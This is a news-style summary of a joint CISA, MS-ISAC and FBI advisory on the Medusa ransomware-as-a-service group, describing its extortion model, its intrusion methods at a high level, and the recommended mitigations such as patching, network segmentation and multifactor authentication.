An alert has been released concerning the Medusa ransomware-as-a-service (RaaS) group, which currently claims over 300 victims in critical infrastructure industries such as healthcare, manufacturing, and education. The group started operations in June 2021 as a closed group prior to adopting the RaaS model, recruiting affiliates to carry out attacks for a portion of the generated ransom payments.
About two years after the group was created, Medusa unveiled a data leak site that lists victims and publishes stolen information when there is no ransom payment received. This method of double extortion requires ransom payment to get the decryption keys and stop the exposure of stolen information. This is typical among RaaS groups, though, for Medusa, its key members have held on to regulation of ransom talks.
Based on the joint cybersecurity warning from the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Federal Bureau of Investigation (FBI), the Medusa programmers hire initial access brokers (IABs) on cybercriminal community groups and marketplaces and offer them incentives to work exclusively with Medusa. The authoring organizations have noticed affiliates employing phishing to get credentials for gaining access to victims’ systems and taking advantage of unpatched program vulnerabilities, such as 2024’s Fortinet EMS SQL injection vulnerability CVE-2023-48788, and ScreenConnect vulnerability CVE-2024-1709.
As soon as a victim’s system has been accessed, Medusa threat actors use living-off-the-land methods for user, network, and file database enumeration, such as SoftPerfect Network Scanner, Advanced IP Scanner, Windows Command Prompt, PowerShell, and Ingress Tool Transfer capabilities, and also Windows Management Instrumentation (WMI) for querying system data.
The authoring companies have noticed Medusa threat actors employing a few PowerShell recognition avoidance methods, and they are known to conceal what they are doing by taking away the PowerShell command line record. Endpoint discovery and response tools are deactivated by utilizing vulnerable or authorized drivers to eliminate processes. Genuine remote access software program is frequently used to avert discovery and help with lateral movement, together with PsExec and Remote Desktop Protocol (RDP). Rclone is employed to assist in data extraction, and the encryptor is used throughout the network employing tools like PDQ Deploy, Sysinternals PsExec, and BigFix. The threat actor also disables Windows Defender and other security applications are also deactivated on particular targets. Backup procedures are stopped, and shadow copies are erased to avoid recovery of encrypted files with no ransom payment. Victims have 48 hours to make a deal regarding the ransom payment before Medusa actors contact victims through phone or electronic mail. There was one case where another ransom demand was released following the release of the ransom payment. The affiliate claimed that he was not paid.
The cybersecurity warning gives indicators of Compromise (IOCs), identified as MITRE ATT&CK tactics and techniques, and suggested mitigations, the most crucial of which are dealing with identified vulnerabilities immediately, segmenting systems to limit lateral motion, selecting system traffic to stop unidentified or untrusted sources from accessing remote services on internal systems, applying multifactor authentication for VPNs, webmail, and all accounts that gain access to critical systems, and giving HIPAA training to healthcare employees regarding phishing identification and prevention.